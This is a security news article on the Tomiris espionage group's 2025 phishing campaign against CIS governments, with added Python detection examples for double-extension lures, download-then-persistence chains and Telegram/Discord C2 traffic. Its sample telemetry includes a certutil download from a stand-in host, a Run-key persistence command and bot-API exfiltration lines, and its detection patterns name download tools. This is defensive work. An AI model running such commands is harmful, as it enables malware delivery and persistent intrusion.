Tomiris APT Infiltrates Governments Via Phishing, Uses Telegram/Discord for C2 Espionage
The Tomiris group launched a new wave of cyber-espionage in early 2025, targeting high-level political and diplomatic institutions. According to Kaspersky Lab, the attacks focused on ministries of foreign affairs, state agencies, and intergovernmental organizations in Russia and across the CIS, with more than a thousand users potentially exposed to the group’s activity.
Initial access is obtained through highly targeted phishing emails carrying archive attachments. These archives are usually password-protected—the password is provided in the body of the email—and contain an executable file disguised as an office document. The attackers alter the icon, extend the filename, and apply a double extension such as “.doc .exe.” When viewed through a typical file manager, the true nature of the file is hidden, and the victim sees what appears to be an ordinary document. The lure themes correspond to governmental workflows, such as discussions on regional development projects in Russia or protocols of intergovernmental meetings.
More than half of the emails and lure files observed in the current campaign are written in Russian, indicating that Russian-speaking users and institutions remain the primary targets. The remaining messages are localized for Turkmenistan, Kyrgyzstan, Tajikistan, and Uzbekistan, where they appear in national languages. Filenames frequently imitate bureaucratic paperwork, such as “аппарат правительства российской федерации по вопросу…” or “план-протокол встречи о сотрудничестве представителей.”
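The double-extension trick described above is easy to catch mechanically once you separate the extension Windows will honour from the decoy in front of it. The following is an added example (not code from the report or from Kaspersky) that inspects ZIP entry names, using constructed sample names modelled on the lures described here:

```python
import io
import re
import zipfile

# Extensions Windows will execute versus the document types the lure imitates.
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".ps1", ".lnk"}
DOCUMENT_EXTS = {".doc", ".docx", ".xls", ".xlsx", ".pdf", ".rtf", ".txt", ".ppt", ".pptx"}
# An extension token is ".xxx" followed by whitespace, another dot, or the end of the name.
EXT_RE = re.compile(r"\.[A-Za-z0-9]{1,5}(?=[\s.]|$)")


def analyze_name(name: str) -> dict:
    """Split a filename into the extension the OS honours and any decoy extensions before it."""
    base = name.replace("\\", "/").rsplit("/", 1)[-1].rstrip()
    exts = [e.lower() for e in EXT_RE.findall(base)]
    true_ext = exts[-1] if exts else ""
    decoys = set(exts[:-1])
    reasons = []
    if true_ext in EXECUTABLE_EXTS:
        if decoys & DOCUMENT_EXTS:
            reasons.append("document extension used as decoy before executable extension")
        if re.search(r"\s{2,}", base):  # padding pushes the real extension out of a narrow name column
            reasons.append("whitespace run inside filename")
        if len(base) > 80:
            reasons.append("unusually long filename")
    return {"name": base, "true_ext": true_ext, "decoys": sorted(decoys), "reasons": reasons}


def scan_archive(data: bytes) -> list:
    """Return ZIP entries that look like executables disguised as documents.
    Entry names stay readable even when the archive content is password-protected."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        results = [analyze_name(i.filename) for i in zf.infolist() if not i.is_dir()]
    return [r for r in results if r["reasons"]]


def build_sample_archive() -> bytes:
    """Constructed archive imitating the lure naming described above; not a real sample."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("план-протокол встречи о сотрудничестве представителей" + " " * 60 + ".doc .exe", b"MZ")
        zf.writestr("протокол заседания.docx", b"PK")
        zf.writestr("setup.exe", b"MZ")
    return buf.getvalue()


if __name__ == "__main__":
    for hit in scan_archive(build_sample_archive()):
        print(hit["name"].split()[0], "->", hit["true_ext"], "|", "; ".join(hit["reasons"]))
```

A plain `setup.exe` is deliberately not flagged: the signal is the mismatch between the decoy and the real extension, not the executable itself.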
Once the attachment is launched, first-stage implants begin to deploy. In most analyzed incidents, these are reverse shells that connect to a command server and grant operators a remote console. Tomiris develops these modules in several programming languages — including C and C++, C#, Go, Rust, and Python. Their capabilities are intentionally minimal: collecting basic system and network information, executing commands, and downloading the next-stage payload. They do not self-propagate nor embed themselves deeply until the operator manually establishes persistence via a second-stage tool.
The next phase involves installing post-exploitation frameworks such as AdaptixC2 and Havoc. To deploy them, attackers rely heavily on legitimate Windows utilities — bitsadmin, curl, PowerShell, and certutil. After verifying that the downloaded file is present and not neutralized by security software, the operator registers it for automatic execution via the Run registry key. With this, Tomiris gains stable, long-term access and can expand its toolkit on demand.
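The sequence in this step, a native download utility followed shortly by a Run key registration on the same host, is a good correlation rule for process-creation telemetry. The following is an added example (not from the report) that runs that rule over constructed events; the log format, hostnames and paths are assumptions:

```python
import re
from datetime import datetime, timedelta

# Stage 1: the native download utilities named in the report (case-insensitive).
DOWNLOAD_RE = re.compile(
    r"(bitsadmin(\.exe)?\s+/transfer|curl(\.exe)?\s.*-o\s|certutil(\.exe)?\s.*-urlcache.*-f|"
    r"powershell.*(invoke-webrequest|downloadfile|iwr\s))", re.I)
# Stage 2: registration under the Run key, via reg.exe or PowerShell.
RUNKEY_RE = re.compile(r"(reg(\.exe)?\s+add\s.*\\currentversion\\run\b|"
                       r"(set|new)-itemproperty\s.*\\currentversion\\run\b)", re.I)
WINDOW = timedelta(minutes=30)


def correlate(events, window=WINDOW):
    """events: dicts with ts (ISO 8601), host, cmdline.
    Returns (host, download_cmdline, runkey_cmdline) for each Run key write that
    follows a download-utility execution on the same host within the window."""
    downloads = {}  # host -> [(ts, cmdline), ...]
    alerts = []
    for e in sorted(events, key=lambda e: e["ts"]):
        ts = datetime.fromisoformat(e["ts"])
        if DOWNLOAD_RE.search(e["cmdline"]):
            downloads.setdefault(e["host"], []).append((ts, e["cmdline"]))
        elif RUNKEY_RE.search(e["cmdline"]):
            for dts, dcmd in downloads.get(e["host"], []):
                if timedelta(0) <= ts - dts <= window:
                    alerts.append((e["host"], dcmd, e["cmdline"]))
    return alerts


# Constructed telemetry (not from the report): one suspicious chain and one benign Run key write.
SAMPLE_EVENTS = [
    {"ts": "2025-03-04T09:12:03", "host": "WS-17", "cmdline":
     "certutil.exe -urlcache -split -f http://example.invalid/upd.bin C:\\Users\\u\\AppData\\Local\\Temp\\upd.exe"},
    {"ts": "2025-03-04T09:12:40", "host": "WS-17", "cmdline":
     "cmd.exe /c dir C:\\Users\\u\\AppData\\Local\\Temp\\upd.exe"},
    {"ts": "2025-03-04T09:13:15", "host": "WS-17", "cmdline":
     "reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Updater /t REG_SZ "
     "/d C:\\Users\\u\\AppData\\Local\\Temp\\upd.exe /f"},
    {"ts": "2025-03-04T11:40:00", "host": "WS-22", "cmdline":
     "reg.exe add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v OneDrive /t REG_SZ "
     "/d \"C:\\Program Files\\OneDrive\\OneDrive.exe\" /f"},
]

if __name__ == "__main__":
    for host, dl, run in correlate(SAMPLE_EVENTS):
        print(f"[{host}] download: {dl}\n        persistence: {run}")
```

The Run key write on WS-22 alone produces nothing; only the download-then-persist pairing on WS-17 is reported.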
A separate section of Kaspersky Lab’s report highlights new implants. Rust Downloader, a previously undocumented module, gathers system details and scans disks for files with extensions such as .jpg, .jpeg, .png, .txt, .rtf, .pdf, .xlsx, and .docx. It then sends operators a list of file paths via Discord webhooks — transmitting only metadata, not file content. The downloader then periodically attempts to fetch a ZIP archive from a Tomiris server using a chain of VBS and PowerShell scripts, extract it into a temporary directory, and launch all executables inside. In observed cases, this archive contained components of the Havoc framework.
Several Tomiris tools are built around popular messaging platforms. The Python Discord ReverseShell uses the discord library and Discord’s public infrastructure as a command channel, receiving text commands and returning execution results. Through it, operators can load additional modules such as the Tomiris Python FileGrabber stealer — which collects documents and images and exfiltrates them as a ZIP archive — and the Tomiris Python Distopia Backdoor, based on the open-source dystopia-c2 project and equipped with standard remote-administration functions. A parallel set of tools leverages Telegram: Python and C# ReverseShell variants and a PowerShell backdoor use bot tokens and chat_id values to receive commands and exfiltrate data through the Telegram API.
Researchers note that in 2025 Tomiris increasingly depends on implants using Telegram and Discord as command-and-control layers. This approach masks malicious traffic as ordinary interactions with popular services, complicating network-level detection and analysis. At the same time, the group continues to rely on older tools such as JLORAT (known since 2022), which executes commands, collects files, captures screenshots, and exhibits Tomiris’s hallmark tactic of distributing multiple modules under similarly long filenames inside encrypted archives with repetitive passwords.
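Because official Telegram and Discord clients never call the Bot API or webhook endpoints, those URL shapes in egress proxy logs are themselves a usable signal, and a host polling `getUpdates` on a short cadence looks like beaconing. The following is an added example (not from the report) that triages constructed proxy log lines of an assumed format and redacts the bot or webhook token before it reaches an alert:

```python
import re
from collections import Counter, defaultdict

# Telegram Bot API: api.telegram.org/bot<token>/<method>; Discord: discord.com/api/webhooks/<id>/<token>.
TELEGRAM_RE = re.compile(r"https?://api\.telegram\.org/bot(\d+:[A-Za-z0-9_-]+)/(\w+)")
DISCORD_RE = re.compile(r"https?://(?:\w+\.)?discord(?:app)?\.com/api/webhooks/(\d+)/([A-Za-z0-9_-]+)")
# Assumed proxy log format: <iso-ts> <client-ip> <http-method> <url> "<user-agent>"
LINE_RE = re.compile(r'^(\S+) (\S+) (\S+) (\S+) "(.*)"$')


def redact(secret: str) -> str:
    """Keep a short prefix so analysts can group hits without copying the full token around."""
    return secret[:6] + "..."


def parse(line: str):
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, ip, http_method, url, ua = m.groups()
    t = TELEGRAM_RE.search(url)
    if t:
        return {"ts": ts, "ip": ip, "service": "telegram_bot_api", "call": t.group(2), "secret": redact(t.group(1)), "ua": ua}
    d = DISCORD_RE.search(url)
    if d:
        return {"ts": ts, "ip": ip, "service": "discord_webhook", "call": http_method, "secret": redact(d.group(2)), "ua": ua}
    return None


def triage(lines):
    """One finding per client that touched a bot API or webhook endpoint, with a polling flag."""
    per_client = defaultdict(list)
    for line in lines:
        hit = parse(line)
        if hit:
            per_client[hit["ip"]].append(hit)
    findings = []
    for ip, hits in per_client.items():
        calls = Counter(h["call"] for h in hits)
        findings.append({"ip": ip, "services": sorted({h["service"] for h in hits}), "calls": dict(calls),
                         "polling": calls["getUpdates"] >= 3, "secrets": sorted({h["secret"] for h in hits}),
                         "non_browser_ua": any(not h["ua"].startswith("Mozilla/") for h in hits)})
    return findings


# Constructed log lines (not real traffic); tokens are placeholders.
SAMPLE_LOG = """\
2025-03-04T09:20:01 10.0.5.17 GET https://api.telegram.org/bot1234567890:AAFakeTokenExample_abc/getUpdates?offset=12 "python-requests/2.31"
2025-03-04T09:20:06 10.0.5.17 GET https://api.telegram.org/bot1234567890:AAFakeTokenExample_abc/getUpdates?offset=12 "python-requests/2.31"
2025-03-04T09:20:11 10.0.5.17 GET https://api.telegram.org/bot1234567890:AAFakeTokenExample_abc/getUpdates?offset=13 "python-requests/2.31"
2025-03-04T09:20:12 10.0.5.17 POST https://api.telegram.org/bot1234567890:AAFakeTokenExample_abc/sendDocument "python-requests/2.31"
2025-03-04T09:21:40 10.0.5.31 POST https://discord.com/api/webhooks/111122223333/FakeWebhookToken_xyz "python-requests/2.31"
2025-03-04T09:22:03 10.0.5.40 GET https://web.telegram.org/a/ "Mozilla/5.0 (Windows NT 10.0)"
""".splitlines()

if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f)
```

The browser visit to web.telegram.org from 10.0.5.40 is not reported, which is the point: the rule keys on the bot and webhook endpoints, not on the service names.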
To move laterally and hide their tracks, Tomiris operators deploy reverse SOCKS proxies. The group’s arsenal includes ReverseSocks modules written in C++ and Go, almost entirely copied from open-source GitHub projects. These allow attackers to proxy vulnerability scanners and other tools through already compromised hosts, advancing the intrusion while remaining within the victim’s internal network.
Kaspersky Lab emphasizes that the 2025 Tomiris campaign strategically mixes modules written in diverse programming languages and relies on widely accessible cloud and messaging services to increase the resilience of its infrastructure and reduce the likelihood of detection. The operators’ core objective is to secure durable remote access to government systems and exfiltrate confidential documents. In several cases, analysts were able to reconstruct the entire attack sequence — from the moment a phishing lure was opened to the final deployment of AdaptixC2 and Havoc.